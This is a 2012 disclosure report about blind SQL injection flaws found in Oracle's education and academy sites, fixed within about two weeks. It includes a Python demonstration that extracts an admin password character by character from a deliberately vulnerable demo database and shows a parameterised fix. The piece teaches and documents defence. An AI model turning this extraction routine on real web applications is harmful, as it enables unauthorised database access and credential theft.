Blind SQL Injection Vulnerabilities reported to Oracle Corporation
The well-known Vulnerability Laboratory researcher Shadab Siddiqui (23) from India discovered this week a remote vulnerability of critical severity in Oracle's web properties. Oracle Corporation (NASDAQ: ORCL) is an American multinational computer technology corporation that specializes in developing and marketing computer hardware systems and enterprise software products, particularly database management systems.
Laboratory:
https://www.vulnerability-lab.com/show.php?user=Shadab%20Siddiqui
Shadab Siddiqui discovered multiple remote blind SQL injection vulnerabilities in different parts of the Oracle web infrastructure. The vulnerabilities allow a remote attacker to inject and execute their own SQL commands on the DBMS behind the affected application. Because the injection is blind, the application never echoes query output; the attacker instead infers data from the difference in the application's response (or response time) to true and false injected conditions. Successful exploitation results in compromise of the DBMS, the service and the application. The vulnerabilities are located in the shop, campus, education and academy services of Oracle.
Affected Service(s):
[+] https://education.oracle.com
[+] https://academy.oracle.com
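As an added illustration (not code from the advisory, from Oracle or from the researcher), the following Python script shows what a boolean-based blind SQL injection of the kind described above looks like against a deliberately vulnerable lookup handler, and why type validation plus a bound parameter stops it. The in-memory SQLite database, the `courses` and `admins` tables and the `admin` password are constructed for the demo and have nothing to do with Oracle's sites; SQLite's `unicode()` and `substr()` stand in for Oracle's `ASCII()` and `SUBSTR()`.

```python
import sqlite3
from typing import Callable, Tuple


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the application's DBMS (not Oracle's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE courses (id INTEGER PRIMARY KEY, title TEXT, public INTEGER)")
    conn.execute("CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT, pw TEXT)")
    conn.executemany(
        "INSERT INTO courses VALUES (?, ?, ?)",
        [(1, "Intro to SQL", 1), (2, "Java Fundamentals", 1), (3, "Internal training", 0)],
    )
    conn.execute("INSERT INTO admins VALUES (1, 'admin', 's3cr3t')")
    conn.commit()
    return conn


def course_exists_vulnerable(conn: sqlite3.Connection, course_id: str) -> bool:
    """Vulnerable handler: the request parameter is pasted into the SQL text.

    The page only reveals whether a course was found (True/False); no query
    output is echoed, which is what makes the injection *blind*.
    """
    sql = "SELECT title FROM courses WHERE public = 1 AND id = " + course_id
    return conn.execute(sql).fetchone() is not None


def course_exists_fixed(conn: sqlite3.Connection, course_id: str) -> bool:
    """Hardened handler: validate the type, then bind the value as a parameter."""
    try:
        cid = int(course_id)
    except ValueError:
        return False
    row = conn.execute(
        "SELECT title FROM courses WHERE public = 1 AND id = ?", (cid,)
    ).fetchone()
    return row is not None


def _binary_search(oracle: Callable[[str], bool], expr: str, hi: int) -> int:
    """Recover the integer value of `expr` using only yes/no answers from the oracle.

    Each probe appends `AND <expr> > mid` to a known-public id (1), so the
    handler's answer reflects only the injected comparison.
    """
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"1 AND {expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(oracle: Callable[[str], bool], max_len: int = 64) -> str:
    """Boolean-based blind extraction of the admin password, one character at a time."""
    target = "(SELECT pw FROM admins WHERE username = 'admin')"
    length = _binary_search(oracle, f"length({target})", max_len)
    chars = []
    for pos in range(1, length + 1):
        # unicode()/substr() are SQLite functions; Oracle would use ASCII()/SUBSTR().
        code = _binary_search(oracle, f"unicode(substr({target}, {pos}, 1))", 127)
        chars.append(chr(code))
    return "".join(chars)


def run_demo() -> Tuple[str, str]:
    """Run the same extraction against both handlers; returns (leaked, blocked)."""
    conn = build_db()
    leaked = blind_extract(lambda p: course_exists_vulnerable(conn, p))
    blocked = blind_extract(lambda p: course_exists_fixed(conn, p))
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = run_demo()
    print(f"vulnerable handler leaked: {leaked!r}")
    print(f"fixed handler leaked:      {blocked!r}")
```

Run it directly to watch the vulnerable handler give up the password a few bits per request while the fixed handler leaks nothing, because the payload never becomes SQL. A time-based variant would replace the `> mid` comparison with a conditional delay and measure response time; that is the other common blind technique when the response body carries no usable difference.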
In coordination with the Oracle security team (Steve M.), the issue was fixed quickly on all instances of the different web services.
The hotfix was released on the web servers within about two weeks of the Vulnerability Laboratory team's report, once Oracle Security had analysed the issue (see the timeline below).
[+] 2012-03-28: Vendor Notification
[+] 2012-03-29: Vendor Response/Feedback
[+] 2012-04-11: Vendor Fix/Patch
[+] 2012-04-12: Public or Non-Public Disclosure
Advisory: https://www.vulnerability-lab.com/get_content.php?id=478
Press/News: http://news.softpedia.com/news/Oracle-Fixes-SQL-Injection-Flaws-on-its-Public-Sites-264140.shtml